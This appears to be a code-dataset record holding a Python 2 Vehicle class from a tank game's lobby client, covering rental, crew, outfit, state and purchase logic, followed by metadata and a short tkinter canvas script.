return self._settings
@settings.setter
def settings(self, value):
self._settings = value
@property
def lock(self):
return self._lock
@property
def repairCost(self):
return self._repairCost
@property
def health(self):
return self._health
@property
def gun(self):
return self._gun
@gun.setter
def gun(self, value):
self._gun = value
@property
def turret(self):
return self._turret
@turret.setter
def turret(self, value):
self._turret = value
@property
def engine(self):
return self._engine
@engine.setter
def engine(self, value):
self._engine = value
@property
def chassis(self):
return self._chassis
@chassis.setter
def chassis(self, value):
self._chassis = value
@property
def radio(self):
return self._radio
@radio.setter
def radio(self, value):
self._radio = value
@property
def fuelTank(self):
return self._fuelTank
@fuelTank.setter
def fuelTank(self, value):
self._fuelTank = value
@property
def optDevices(self):
return self._optDevices
@property
def shells(self):
return self._shells
@property
def equipment(self):
return self._equipment
@property
def equipmentLayout(self):
return self._equipmentLayout
@property
def modules(self):
return (self.chassis,
self.turret if self.hasTurrets else None,
self.gun,
self.engine,
self.radio)
@property
def bonuses(self):
return self._bonuses
@property
def crewIndices(self):
return self._crewIndices
@property
def crew(self):
return self._crew
@crew.setter
def crew(self, value):
self._crew = value
@property
def lastCrew(self):
return self._lastCrew
@property
def hasModulesToSelect(self):
return self._hasModulesToSelect
@property
def isRentable(self):
return self.hasRentPackages and not self.isPurchased
@property
def isPurchased(self):
return self.isInInventory and not self.rentInfo.isRented
def isPreviewAllowed(self):
return not self.isInInventory and not self.isSecret
@property
def rentExpiryTime(self):
return self.rentInfo.rentExpiryTime
@property
def rentCompensation(self):
return self.rentInfo.compensations
@property
def isRentAvailable(self):
return self.maxRentDuration - self.rentLeftTime >= self.minRentDuration if self._rentPackagesInfo.mainRentType == RentType.TIME_RENT else self._rentPackagesInfo.hasAvailableRentPackages and self._rentPackagesInfo.mainRentType in (RentType.SEASON_RENT, RentType.SEASON_CYCLE_RENT)
@property
def isRentPromotion(self):
return checkForTags(self.tags, VEHICLE_TAGS.RENT_PROMOTION) and self.rentExpiryState and self.isRentable and self.isRentAvailable and self.isUnlocked
@property
def minRentPrice(self):
minRentPackage = self.getRentPackage()
return minRentPackage.get('rentPrice', MONEY_UNDEFINED) if minRentPackage is not None else MONEY_UNDEFINED
@property
def isRented(self):
return self.rentInfo.isRented
@property
def currentSeasonRent(self):
return self.rentInfo.getActiveSeasonRent()
@property
def rentLeftTime(self):
return self.rentInfo.getTimeLeft()
@property
def maxRentDuration(self):
return self._maxRentDuration
@property
def minRentDuration(self):
return self._minRentDuration
@property
def rentalIsOver(self):
return self.isRented and self.rentExpiryState and not self.isSelected
@property
def rentalIsActive(self):
return self.isRented and not self.rentExpiryState
@property
def rentLeftBattles(self):
return self.rentInfo.battlesLeft
@property
def isSeasonRent(self):
return bool(self.rentInfo.seasonRent)
@property
def rentExpiryState(self):
return self.rentInfo.getExpiryState()
@property
def type(self):
return set(vehicles.VEHICLE_CLASS_TAGS & self.tags).pop()
@property
def typeUserName(self):
return getTypeUserName(self.type, self.isElite)
@property
def hasTurrets(self):
vDescr = self.descriptor
return len(vDescr.hull.fakeTurrets['lobby']) != len(vDescr.turrets)
@property
def hasBattleTurrets(self):
vDescr = self.descriptor
return len(vDescr.hull.fakeTurrets['battle']) != len(vDescr.turrets)
@property
def ammoMaxSize(self):
return self.descriptor.gun.maxAmmo
@property
def isAmmoFull(self):
return sum((s.count for s in self.shells)) >= self.ammoMaxSize * _NOT_FULL_AMMO_MULTIPLIER
@property
def hasShells(self):
return sum((s.count for s in self.shells)) > 0
@property
def hasCrew(self):
return findFirst(lambda x: x[1] is not None, self.crew) is not None
@property
def hasEquipments(self):
return findFirst(None, self.equipment.regularConsumables) is not None
@property
def hasOptionalDevices(self):
return findFirst(None, self.optDevices) is not None
@property
def modelState(self):
if self.health < 0:
return Vehicle.VEHICLE_STATE.EXPLODED
return Vehicle.VEHICLE_STATE.DESTROYED if self.repairCost > 0 and self.health == 0 else Vehicle.VEHICLE_STATE.UNDAMAGED
@property
def isWheeledTech(self):
return self._descriptor.type.isWheeledVehicle
def getC11nItemNoveltyCounter(self, proxy, item):
newItems = proxy.inventory.getC11nItemsNoveltyCounters(self._descriptor.type)
return newItems.get(item.intCD, 0)
def getC11nItemsNoveltyCounter(self, proxy, itemTypes=None, season=None):
count = 0
newItems = proxy.inventory.getC11nItemsNoveltyCounters(self._descriptor.type)
for itemCD, qtyItems in newItems.iteritems():
item = proxy.getItemByCD(itemCD)
if (itemTypes is None or item.itemTypeID in itemTypes) and (season is None or item.season & season):
count += qtyItems
return count
def getNewC11nItems(self, proxy):
newItemsIds = proxy.inventory.getC11nItemsNoveltyCounters(self._descriptor.type).iterkeys()
newItems = [ proxy.getItemByCD(itemCD) for itemCD in newItemsIds ]
return newItems
def getState(self, isCurrentPlayer=True):
ms = self.modelState
if not self.isInInventory and isCurrentPlayer:
ms = Vehicle.VEHICLE_STATE.NOT_PRESENT
if self.isInBattle:
ms = Vehicle.VEHICLE_STATE.BATTLE
elif self.rentalIsOver:
ms = Vehicle.VEHICLE_STATE.RENTAL_IS_OVER
if self.isPremiumIGR:
ms = Vehicle.VEHICLE_STATE.IGR_RENTAL_IS_OVER
elif self.isTelecom:
ms = Vehicle.VEHICLE_STATE.DEAL_IS_OVER
elif self.isDisabledInPremIGR:
ms = Vehicle.VEHICLE_STATE.IN_PREMIUM_IGR_ONLY
elif self.isInPrebattle:
ms = Vehicle.VEHICLE_STATE.IN_PREBATTLE
elif self.isLocked:
ms = Vehicle.VEHICLE_STATE.LOCKED
elif self.isDisabledInRoaming:
ms = Vehicle.VEHICLE_STATE.SERVER_RESTRICTION
elif self.isRotationGroupLocked:
ms = Vehicle.VEHICLE_STATE.ROTATION_GROUP_LOCKED
ms = self.__checkUndamagedState(ms, isCurrentPlayer)
ms = self.__getRentableState(ms, isCurrentPlayer)
if ms in Vehicle.CAN_SELL_STATES and self.__customState:
ms = self.__customState
return (ms, self.__getStateLevel(ms))
def setCustomState(self, state):
self.__customState = state
def getCustomState(self):
return self.__customState
def clearCustomState(self):
self.__customState = ''
def isCustomStateSet(self):
return self.__customState != ''
def __checkUndamagedState(self, state, isCurrnentPlayer=True):
if state == Vehicle.VEHICLE_STATE.UNDAMAGED and isCurrnentPlayer:
if self.isBroken:
return Vehicle.VEHICLE_STATE.DAMAGED
if not self.isCrewFull:
return Vehicle.VEHICLE_STATE.CREW_NOT_FULL
if not self.isAmmoFull:
return Vehicle.VEHICLE_STATE.AMMO_NOT_FULL
if not self.isRotationGroupLocked and self.rotationGroupNum != 0:
return Vehicle.VEHICLE_STATE.ROTATION_GROUP_UNLOCKED
return state
def __getRentableState(self, state, isCurrentPlayer):
if isCurrentPlayer and self.isRentPromotion and self._rentPackagesInfo.hasAvailableRentPackages:
if not self.isRented:
return Vehicle.VEHICLE_STATE.RENTABLE
return Vehicle.VEHICLE_STATE.RENTABLE_AGAIN
return state
@classmethod
def __getEventVehicles(cls):
return cls.eventsCache.getEventVehicles()
def isRotationApplied(self):
return self.rotationGroupNum != 0
def isGroupReady(self):
return (True, '')
def __getStateLevel(self, state):
if state in (Vehicle.VEHICLE_STATE.CREW_NOT_FULL,
Vehicle.VEHICLE_STATE.DAMAGED,
Vehicle.VEHICLE_STATE.EXPLODED,
Vehicle.VEHICLE_STATE.DESTROYED,
Vehicle.VEHICLE_STATE.SERVER_RESTRICTION,
Vehicle.VEHICLE_STATE.RENTAL_IS_OVER,
Vehicle.VEHICLE_STATE.IGR_RENTAL_IS_OVER,
Vehicle.VEHICLE_STATE.AMMO_NOT_FULL,
Vehicle.VEHICLE_STATE.AMMO_NOT_FULL_EVENTS,
Vehicle.VEHICLE_STATE.UNSUITABLE_TO_QUEUE,
Vehicle.VEHICLE_STATE.DEAL_IS_OVER,
Vehicle.VEHICLE_STATE.UNSUITABLE_TO_UNIT,
Vehicle.VEHICLE_STATE.ROTATION_GROUP_LOCKED):
return Vehicle.VEHICLE_STATE_LEVEL.CRITICAL
if state in (Vehicle.VEHICLE_STATE.UNDAMAGED, Vehicle.VEHICLE_STATE.ROTATION_GROUP_UNLOCKED):
return Vehicle.VEHICLE_STATE_LEVEL.INFO
return Vehicle.VEHICLE_STATE_LEVEL.RENTABLE if state in (Vehicle.VEHICLE_STATE.RENTABLE, Vehicle.VEHICLE_STATE.RENTABLE_AGAIN) else Vehicle.VEHICLE_STATE_LEVEL.WARNING
@property
def isPremium(self):
return checkForTags(self.tags, VEHICLE_TAGS.PREMIUM)
@property
def isPremiumIGR(self):
return checkForTags(self.tags, VEHICLE_TAGS.PREMIUM_IGR)
@property
def isSecret(self):
return checkForTags(self.tags, VEHICLE_TAGS.SECRET)
@property
def isSpecial(self):
return checkForTags(self.tags, VEHICLE_TAGS.SPECIAL)
@property
def isExcludedFromSandbox(self):
return checkForTags(self.tags, VEHICLE_TAGS.EXCLUDED_FROM_SANDBOX)
@property
def isObserver(self):
return checkForTags(self.tags, VEHICLE_TAGS.OBSERVER)
@property
def isEvent(self):
return self.isOnlyForEventBattles and self in Vehicle.__getEventVehicles()
@property
def isDisabledInRoaming(self):
return checkForTags(self.tags, VEHICLE_TAGS.DISABLED_IN_ROAMING) and self.lobbyContext.getServerSettings().roaming.isInRoaming()
@property
def canNotBeSold(self):
return checkForTags(self.tags, VEHICLE_TAGS.CANNOT_BE_SOLD)
@property
def isUnrecoverable(self):
return checkForTags(self.tags, VEHICLE_TAGS.UNRECOVERABLE)
@property
def isCrewLocked(self):
return checkForTags(self.tags, VEHICLE_TAGS.CREW_LOCKED)
@property
def isOutfitLocked(self):
return checkForTags(self.tags, VEHICLE_TAGS.OUTFIT_LOCKED)
@property
def isDisabledInPremIGR(self):
return self.isPremiumIGR and self.igrCtrl.getRoomType() != constants.IGR_TYPE.PREMIUM
@property
def name(self):
return self.descriptor.type.name
@property
def userName(self):
return getUserName(self.descriptor.type)
@property
def longUserName(self):
typeInfo = getTypeInfoByName('vehicle')
tagsDump = [ typeInfo['tags'][tag]['userString'] for tag in self.tags if typeInfo['tags'][tag]['userString'] != '' ]
return '%s %s' % (''.join(tagsDump), getUserName(self.descriptor.type))
@property
def shortUserName(self):
return getShortUserName(self.descriptor.type)
@property
def level(self):
return self.descriptor.type.level
@property
def fullDescription(self):
description = self.descriptor.type.description
return description if description.find('_descr') == -1 else ''
@property
def shortDescriptionSpecial(self):
description = self.descriptor.type.shortDescriptionSpecial
return description if description.find('_short_special') == -1 else ''
@property
def longDescriptionSpecial(self):
description = self.descriptor.type.longDescriptionSpecial
return description if description.find('_long_special') == -1 else ''
@property
def tags(self):
return self.descriptor.type.tags
@property
def rotationGroupIdx(self):
return self.rotationGroupNum - 1
@property
def canSell(self):
if not self.isInInventory:
return False
st, _ = self.getState()
if self.isRented:
if not self.rentalIsOver:
return False
if st in (self.VEHICLE_STATE.RENTAL_IS_OVER, self.VEHICLE_STATE.IGR_RENTAL_IS_OVER, self.VEHICLE_STATE.RENTABLE_AGAIN):
st = self.__checkUndamagedState(self.modelState)
return st in self.CAN_SELL_STATES and not checkForTags(self.tags, VEHICLE_TAGS.CANNOT_BE_SOLD)
@property
def isLocked(self):
return self.lock[0] != LOCK_REASON.NONE
@property
def isInBattle(self):
return self.lock[0] == LOCK_REASON.ON_ARENA
@property
def isInPrebattle(self):
return self.lock[0] in (LOCK_REASON.PREBATTLE, LOCK_REASON.UNIT)
@property
def isAwaitingBattle(self):
return self.lock[0] == LOCK_REASON.IN_QUEUE
@property
def isInUnit(self):
return self.lock[0] == LOCK_REASON.UNIT
@property
def typeOfLockingArena(self):
return None if not self.isLocked else self.lock[1]
@property
def isBroken(self):
return self.repairCost > 0
@property
def isAlive(self):
return not self.isBroken and not self.isLocked
@property
def isCrewFull(self):
crew = [ tman for _, tman in self.crew ]
return None not in crew and len(crew)
@property
def isOnlyForEventBattles(self):
return checkForTags(self.tags, VEHICLE_TAGS.EVENT)
@property
def isOnlyForEpicBattles(self):
return checkForTags(self.tags, VEHICLE_TAGS.EPIC_BATTLES)
@property
def isTelecom(self):
return checkForTags(self.tags, VEHICLE_TAGS.TELECOM)
@property
def isTelecomDealOver(self):
return self.isTelecom and self.rentExpiryState
def hasLockMode(self):
isBS = prb_getters.isBattleSession()
if isBS:
isBSVehicleLockMode = bool(prb_getters.getPrebattleSettings()[PREBATTLE_SETTING_NAME.VEHICLE_LOCK_MODE])
if isBSVehicleLockMode and self.clanLock > 0:
return True
return False
def isReadyToPrebattle(self, checkForRent=True):
if checkForRent and self.rentalIsOver:
return False
if not self.isGroupReady()[0]:
return False
result = not self.hasLockMode()
if result:
result = not self.isBroken and self.isCrewFull and not self.isDisabledInPremIGR and not self.isInBattle and not self.isRotationGroupLocked
return result
@property
def isReadyToFight(self):
if self.rentalIsOver:
return False
if not self.isGroupReady()[0]:
return False
result = not self.hasLockMode()
if result:
result = self.isAlive and self.isCrewFull and not self.isDisabledInRoaming and not self.isDisabledInPremIGR and not self.isRotationGroupLocked
return result
@property
def isXPToTman(self):
return bool(self.settings & VEHICLE_SETTINGS_FLAG.XP_TO_TMAN)
@property
def isAutoRepair(self):
return bool(self.settings & VEHICLE_SETTINGS_FLAG.AUTO_REPAIR)
@property
def isAutoLoad(self):
return bool(self.settings & VEHICLE_SETTINGS_FLAG.AUTO_LOAD)
@property
def isAutoEquip(self):
return bool(self.settings & VEHICLE_SETTINGS_FLAG.AUTO_EQUIP)
def isAutoBattleBoosterEquip(self):
return bool(self.settings & VEHICLE_SETTINGS_FLAG.AUTO_EQUIP_BOOSTER)
@property
def isFavorite(self):
return bool(self.settings & VEHICLE_SETTINGS_FLAG.GROUP_0)
@property
def isAutoRentStyle(self):
return bool(self.settings & VEHICLE_SETTINGS_FLAG.AUTO_RENT_CUSTOMIZATION)
@prbDispatcherProperty
def __prbDispatcher(self):
return None
def isCustomizationEnabled(self):
locked = False
if self.__prbDispatcher is not None:
permission = self.__prbDispatcher.getGUIPermissions()
if permission is not None:
locked = not permission.canChangeVehicle()
return not self.isOnlyForEventBattles and not self.isInBattle and self.isInInventory and not self.isLocked and not locked and not self.isBroken and not self.rentalIsOver and not self.isOutfitLocked
def isAutoLoadFull(self):
if self.isAutoLoad:
for shell in self.shells:
if shell.count != shell.defaultCount:
return False
return True
def isAutoEquipFull(self):
return self.equipment.regularConsumables == self.equipmentLayout.regularConsumables if self.isAutoEquip else True
def mayPurchase(self, money):
if self.isOnlyForEventBattles:
return (False, 'isDisabledForBuy')
if self.isDisabledForBuy:
return (False, 'isDisabledForBuy')
return (False, 'premiumIGR') if self.isPremiumIGR else super(Vehicle, self).mayPurchase(money)
def mayRent(self, money):
if getattr(BigWorld.player(), 'isLongDisconnectedFromCenter', False):
return (False, GUI_ITEM_ECONOMY_CODE.CENTER_UNAVAILABLE)
if self.isDisabledForBuy and not self.isRentable:
return (False, GUI_ITEM_ECONOMY_CODE.RENTAL_DISABLED)
if self.isRentable and not self.isRentAvailable:
return (False, GUI_ITEM_ECONOMY_CODE.RENTAL_TIME_EXCEEDED)
minRentPrice = self.minRentPrice
return self._isEnoughMoney(minRentPrice, money) if minRentPrice else (False, GUI_ITEM_ECONOMY_CODE.NO_RENT_PRICE)
def mayRestore(self, money):
if getattr(BigWorld.player(), 'isLongDisconnectedFromCenter', False):
return (False, GUI_ITEM_ECONOMY_CODE.CENTER_UNAVAILABLE)
return (False, GUI_ITEM_ECONOMY_CODE.RESTORE_DISABLED) if not self.isRestoreAvailable() or constants.IS_CHINA and self.rentalIsActive else self._isEnoughMoney(self.restorePrice, money)
def mayRestoreWithExchange(self, money, exchangeRate):
mayRestore, reason = self.mayRestore(money)
if mayRestore:
return mayRestore
if reason == GUI_ITEM_ECONOMY_CODE.NOT_ENOUGH_CREDITS and money.isSet(Currency.GOLD):
money = money.exchange(Currency.GOLD, Currency.CREDITS, exchangeRate, default=0)
mayRestore, reason = self._isEnoughMoney(self.restorePrice, money)
return mayRestore
return False
def getRentPackage(self, rentID=None):
if rentID is not None:
for package in self.rentPackages:
if package.get('rentID', None) == rentID:
return package
elif self.rentPackages:
return min(self.rentPackages, key=itemgetter('rentPrice'))
return
def getGUIEmblemID(self):
return self.icon
def getRentPackageActionPrc(self, rentID=None):
package = self.getRentPackage(rentID)
return getActionPrc(package['rentPrice'], package['defaultRentPrice']) if package else 0
def getAutoUnlockedItems(self):
return self.descriptor.type.autounlockedItems[:]
def getAutoUnlockedItemsMap(self):
return dict(((vehicles.getItemByCompactDescr(nodeCD).itemTypeName, nodeCD) for nodeCD in self.descriptor.type.autounlockedItems))
def getUnlocksDescrs(self):
for unlockIdx, data in enumerate(self.descriptor.type.unlocksDescrs):
yield (unlockIdx,
data[0],
data[1],
set(data[2:]))
def getUnlocksDescr(self, unlockIdx):
try:
data = self.descriptor.type.unlocksDescrs[unlockIdx]
except IndexError:
data = (0, 0, set())
return (data[0], data[1], set(data[2:]))
def getPerfectCrew(self):
return self.getCrewBySkillLevels(100)
def getCrewWithoutSkill(self, skillName):
crewItems = list()
crewRoles = self.descriptor.type.crewRoles
for slotIdx, tman in self.crew:
if tman and skillName in tman.skillsMap:
tmanDescr = tman.descriptor
skills = tmanDescr.skills[:]
if tmanDescr.skillLevel(skillName) < tankmen.MAX_SKILL_LEVEL:
lastSkillLevel = tankmen.MAX_SKILL_LEVEL
else:
lastSkillLevel = tmanDescr.lastSkillLevel
skills.remove(skillName)
unskilledTman = self.itemsFactory.createTankman(tankmen.generateCompactDescr(tmanDescr.getPassport(), tmanDescr.vehicleTypeID, tmanDescr.role, tmanDescr.roleLevel, skills, lastSkillLevel), vehicle=self)
crewItems.append((slotIdx, unskilledTman))
crewItems.append((slotIdx, tman))
return sortCrew(crewItems, crewRoles)
def getCrewBySkillLevels(self, defRoleLevel, skillsByIdxs=None, levelByIdxs=None, nativeVehsByIdxs=None):
skillsByIdxs = skillsByIdxs or {}
levelByIdxs = levelByIdxs or {}
nativeVehsByIdxs = nativeVehsByIdxs or {}
crewItems = list()
crewRoles = self.descriptor.type.crewRoles
for idx, _ in enumerate(crewRoles):
defRoleLevel = levelByIdxs.get(idx, defRoleLevel)
if defRoleLevel is not None:
role = self.descriptor.type.crewRoles[idx][0]
nativeVehicle = nativeVehsByIdxs.get(idx)
if nativeVehicle is not None:
nationID, vehicleTypeID = nativeVehicle.descriptor.type.id
else:
nationID, vehicleTypeID = self.descriptor.type.id
tankman = self.itemsFactory.createTankman(tankmen.generateCompactDescr(tankmen.generatePassport(nationID), vehicleTypeID, role, defRoleLevel, skillsByIdxs.get(idx, [])), vehicle=self)
else:
tankman = None
crewItems.append((idx, tankman))
return sortCrew(crewItems, crewRoles)
def getOutfit(self, season):
for outfit in (self._styledOutfits.get(season), self._customOutfits.get(season)):
if outfit and outfit.isActive():
return outfit
return None
def setCustomOutfit(self, season, outfit):
self._customOutfits[season] = outfit
def setOutfits(self, fromVehicle):
for season in SeasonType.SEASONS:
self._customOutfits[season] = fromVehicle.getCustomOutfit(season)
self._styledOutfits[season] = fromVehicle.getStyledOutfit(season)
def getCustomOutfit(self, season):
return self._customOutfits.get(season)
def getStyledOutfit(self, season):
return self._styledOutfits.get(season)
def hasOutfit(self, season):
outfit = self.getOutfit(season)
return outfit is not None
def hasOutfitWithItems(self, season):
outfit = self.getOutfit(season)
return outfit is not None and not outfit.isEmpty()
def getBonusCamo(self):
for season in SeasonType.SEASONS:
outfit = self.getOutfit(season)
if not outfit:
continue
camo = outfit.hull.slotFor(GUI_ITEM_TYPE.CAMOUFLAGE).getItem()
if camo:
return camo
return None
def getAnyOutfitSeason(self):
activeSeasons = []
for season in SeasonType.COMMON_SEASONS:
if self.hasOutfitWithItems(season):
activeSeasons.append(season)
return random.choice(activeSeasons) if activeSeasons else SeasonType.SUMMER
def isRestorePossible(self):
return self.restoreInfo.isRestorePossible() if not self.isPurchased and not self.isUnrecoverable and self.lobbyContext.getServerSettings().isVehicleRestoreEnabled() and self.restoreInfo is not None else False
def isRestoreAvailable(self):
return self.isRestorePossible() and not self.restoreInfo.isInCooldown()
def hasLimitedRestore(self):
return self.isRestorePossible() and self.restoreInfo.isLimited() and self.restoreInfo.getRestoreTimeLeft() > 0
def hasRestoreCooldown(self):
return self.isRestorePossible() and self.restoreInfo.isInCooldown()
def isRecentlyRestored(self):
return self.isPurchased and self.restoreInfo.isInCooldown() if self.restoreInfo is not None else False
def __cmp__(self, other):
if self.isRestorePossible() and not other.isRestorePossible():
return -1
if not self.isRestorePossible() and other.isRestorePossible():
return 1
return cmp(other.hasLimitedRestore(), self.hasLimitedRestore()) or cmp(self.restoreInfo.getRestoreTimeLeft(), other.restoreInfo.getRestoreTimeLeft()) if self.isRestorePossible() and other.isRestorePossible() else super(Vehicle, self).__cmp__(other)
def __eq__(self, other):
return False if other is None else self.descriptor.type.id == other.descriptor.type.id
def __repr__(self):
return 'Vehicle<id:%d, intCD:%d, nation:%d, lock:%s>' % (self.invID,
self.intCD,
self.nationID,
self.lock)
def _mayPurchase(self, price, money):
return (False, GUI_ITEM_ECONOMY_CODE.CENTER_UNAVAILABLE) if getattr(BigWorld.player(), 'isLongDisconnectedFromCenter', False) else super(Vehicle, self)._mayPurchase(price, money)
def _getShortInfo(self, vehicle=None, expanded=False):
description = i18n.makeString('#menu:descriptions/' + self.itemTypeName)
caliber = self.descriptor.gun.shots[0].shell.caliber
armor = findVehicleArmorMinMax(self.descriptor)
return description % {'weight': BigWorld.wg_getNiceNumberFormat(float(self.descriptor.physics['weight']) / 1000),
'hullArmor': BigWorld.wg_getIntegralFormat(armor[1]),
'caliber': BigWorld.wg_getIntegralFormat(caliber)}
def _sortByType(self, other):
return compareByVehTypeName(self.type, other.type)
def __hasModulesToSelect(self):
components = []
for moduleCD in self.descriptor.type.installableComponents:
moduleType = getTypeOfCompactDescr(moduleCD)
if moduleType == GUI_ITEM_TYPE.FUEL_TANK:
continue
if moduleType in components:
return True
components.append(moduleType)
return False
def __calcMinMaxRentDuration(self):
if self.rentPackages:
maxDays = None
minDays = None
for package in self.rentPackages:
rentID = package.get('rentID', 0)
rentType, days = parseRentID(rentID)
if rentType == RentType.TIME_RENT:
if maxDays is None or days > maxDays:
maxDays = days
if minDays is None or days < minDays:
minDays = days
maxDuration = maxDays * _MAX_RENT_MULTIPLIER * time_utils.ONE_DAY if maxDays else 0
minDuration = minDays * time_utils.ONE_DAY if minDays else 0
return (maxDuration, minDuration)
else:
return (0, 0)
def getTypeUserName(vehType, isElite):
return i18n.makeString('#menu:header/vehicleType/elite/%s' % vehType) if isElite else i18n.makeString('#menu:header/vehicleType/%s' % vehType)
def getTypeShortUserName(vehType):
return i18n.makeString('#menu:classes/short/%s' % vehType)
def _getLevelIconName(vehLevel, postfix=''):
return 'tank_level_%s%d.png' % (postfix, int(vehLevel))
def getLevelBigIconPath(vehLevel):
return '../maps/icons/levels/%s' % _getLevelIconName(vehLevel, 'big_')
def getLevelSmallIconPath(vehLevel):
return '../maps/icons/levels/%s' % _getLevelIconName(vehLevel, 'small_')
def getLevelIconPath(vehLevel):
return '../maps/icons/levels/%s' % _getLevelIconName(vehLevel)
def getIconPath(vehicleName):
return '../maps/icons/vehicle/%s' % getItemIconName(vehicleName)
def getNationLessName(vehicleName):
return vehicleName.split(':')[1]
def getIconShopPath(vehicleName, size=STORE_CONSTANTS.ICON_SIZE_MEDIUM):
name = getNationLessName(vehicleName)
path = RES_SHOP_EXT.getVehicleIcon(size, name)
return func_utils.makeFlashPath(path) if path is not None else '../maps/shop/vehicles/%s/empty_tank.png' % size
def getIconResource(vehicleName):
rName = getIconResourceName(vehicleName=vehicleName)
return R.images.gui.maps.icons.vehicle.dyn(rName)
def getIconResourceName(vehicleName):
return vehicleName.replace(':', '_').replace('-', '_')
def getContourIconPath(vehicleName):
return '../maps/icons/vehicle/contour/%s' % getItemIconName(vehicleName)
def getSmallIconPath(vehicleName):
return '../maps/icons/vehicle/small/%s' % getItemIconName(vehicleName)
def getUniqueIconPath(vehicleName, withLightning=False):
return '../maps/icons/vehicle/unique/%s' % getItemIconName(vehicleName) if withLightning else '../maps/icons/vehicle/unique/normal_%s' % getItemIconName(vehicleName)
def getTypeSmallIconPath(vehicleType, isElite=False):
return RES_ICONS.maps_icons_vehicletypes_elite_all_png(vehicleType) if isElite else RES_ICONS.maps_icons_vehicletypes_all_png(vehicleType)
def getTypeBigIconPath(vehicleType, isElite=False):
return RES_ICONS.getVehicleTypeBigIcon(vehicleType, '_elite' if isElite else '')
def getUserName(vehicleType, textPrefix=False):
return _getActualName(vehicleType.userString, vehicleType.tags, textPrefix)
def getShortUserName(vehicleType, textPrefix=False):
return _getActualName(vehicleType.shortUserString, vehicleType.tags, textPrefix)
def _getActualName(name, tags, textPrefix=False):
if checkForTags(tags, VEHICLE_TAGS.PREMIUM_IGR):
if textPrefix:
return i18n.makeString(ITEM_TYPES.MARKER_IGR, vehName=name)
return makeHtmlString('html_templates:igr/premium-vehicle', 'name', {'vehicle': name})
return name
def checkForTags(vTags, tags):
if not hasattr(tags, '__iter__'):
tags = (tags,)
return bool(vTags & frozenset(tags))
def findVehicleArmorMinMax(vd):
def findComponentArmorMinMax(armor, minMax):
for value in armor:
if value != 0:
if minMax is None:
minMax = [value, value]
else:
minMax[0] = min(minMax[0], value)
minMax[1] = max(minMax[1], value)
return minMax
minMax = None
minMax = findComponentArmorMinMax(vd.hull.primaryArmor, minMax)
for turrets in vd.type.turrets:
for turret in turrets:
minMax = findComponentArmorMinMax(turret.primaryArmor, minMax)
return minMax
def sortCrew(crewItems, crewRoles):
RO = Tankman.TANKMEN_ROLES_ORDER
return sorted(crewItems, cmp=lambda a, b: RO[crewRoles[a[0]][0]] - RO[crewRoles[b[0]][0]])
def getLobbyDescription(vehicle):
return text_styles.stats(i18n.makeString('#menu:header/level/%s' % vehicle.level)) + ' ' + text_styles.main(i18n.makeString('#menu:header/level', vTypeName=getTypeUserName(vehicle.type, vehicle.isElite)))
def getOrderByVehicleClass(className=None):
if className and className in VEHICLE_BATTLE_TYPES_ORDER_INDICES:
result = VEHICLE_BATTLE_TYPES_ORDER_INDICES[className]
else:
result = UNKNOWN_VEHICLE_CLASS_ORDER
return result
def getVehicleClassTag(tags):
subSet = vehicles.VEHICLE_CLASS_TAGS & tags
result = None
if subSet:
result = list(subSet).pop()
return result
_VEHICLE_STATE_TO_ICON = {Vehicle.VEHICLE_STATE.BATTLE: RES_ICONS.MAPS_ICONS_VEHICLESTATES_BATTLE,
Vehicle.VEHICLE_STATE.IN_PREBATTLE: RES_ICONS.MAPS_ICONS_VEHICLESTATES_INPREBATTLE,
Vehicle.VEHICLE_STATE.DAMAGED: RES_ICONS.MAPS_ICONS_VEHICLESTATES_DAMAGED,
Vehicle.VEHICLE_STATE.DESTROYED: RES_ICONS.MAPS_ICONS_VEHICLESTATES_DAMAGED,
Vehicle.VEHICLE_STATE.EXPLODED: RES_ICONS.MAPS_ICONS_VEHICLESTATES_DAMAGED,
Vehicle.VEHICLE_STATE.CREW_NOT_FULL: RES_ICONS.MAPS_ICONS_VEHICLESTATES_CREWNOTFULL,
Vehicle.VEHICLE_STATE.RENTAL_IS_OVER: RES_ICONS.MAPS_ICONS_VEHICLESTATES_RENTALISOVER,
Vehicle.VEHICLE_STATE.UNSUITABLE_TO_UNIT: RES_ICONS.MAPS_ICONS_VEHICLESTATES_UNSUITABLETOUNIT,
Vehicle.VEHICLE_STATE.UNSUITABLE_TO_QUEUE: RES_ICONS.MAPS_ICONS_VEHICLESTATES_UNSUITABLETOUNIT,
Vehicle.VEHICLE_STATE.GROUP_IS_NOT_READY: RES_ICONS.MAPS_ICONS_VEHICLESTATES_GROUP_IS_NOT_READY}
_VEHICLE_STATE_TO_ADD_ICON = {Vehicle.VEHICLE_STATE.RENTABLE: RES_ICONS.MAPS_ICONS_VEHICLESTATES_RENT_ICO_BIG,
Vehicle.VEHICLE_STATE.RENTABLE_AGAIN: RES_ICONS.MAPS_ICONS_VEHICLESTATES_RENTAGAIN_ICO_BIG}
def getVehicleStateIcon(vState):
if vState in _VEHICLE_STATE_TO_ICON:
icon = _VEHICLE_STATE_TO_ICON[vState]
else:
icon = ''
return icon
def getVehicleStateAddIcon(vState):
if vState in _VEHICLE_STATE_TO_ADD_ICON:
icon = _VEHICLE_STATE_TO_ADD_ICON[vState]
else:
icon = ''
return icon
def getBattlesLeft(vehicle):
return i18n.makeString('#menu:infinitySymbol') if vehicle.isInfiniteRotationGroup else str(vehicle.rotationBattlesLeft)
| [
"[email protected]"
]
| |
cd2b3e03c7d4829e4d97f8148c5adb257164f06b | 9c124f6accd89a3ccf08b4c1205159d78c731f85 | /5/main2.py | 90c084d9fdd727393875c7852c0b3e4be61179b0 | []
| no_license | irongamer54/Sumer_2021 | 5600272dc11bddf6276bb56d0db4cff66ff6b20d | d61348274772cf95f0b06f904bfbb0ec61ebd1b1 | refs/heads/master | 2023-06-26T12:26:41.623768 | 2021-07-23T03:46:18 | 2021-07-23T03:46:18 | 383,372,964 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 196 | py | from tkinter import *
root=Tk()
canvas=Canvas(root,width=500,height=500)
canvas.pack()
pers_obj = PhotoImage(file="pers.png")
canvas.create_image(50,50,anchor= NW, image=pers_obj)
root.mainloop() | [
"[email protected]"
]
| |
8dfcde4d529883da7fcaa024d87d1e941b74687a | 6caab8d886e8bd302d1994ff663cf5ccb5e11522 | /MyNotes_01/Step01/3-OO/day02_10/demo02.py | af2d3e088e530fe9803b841cfed86c5256b3275a | []
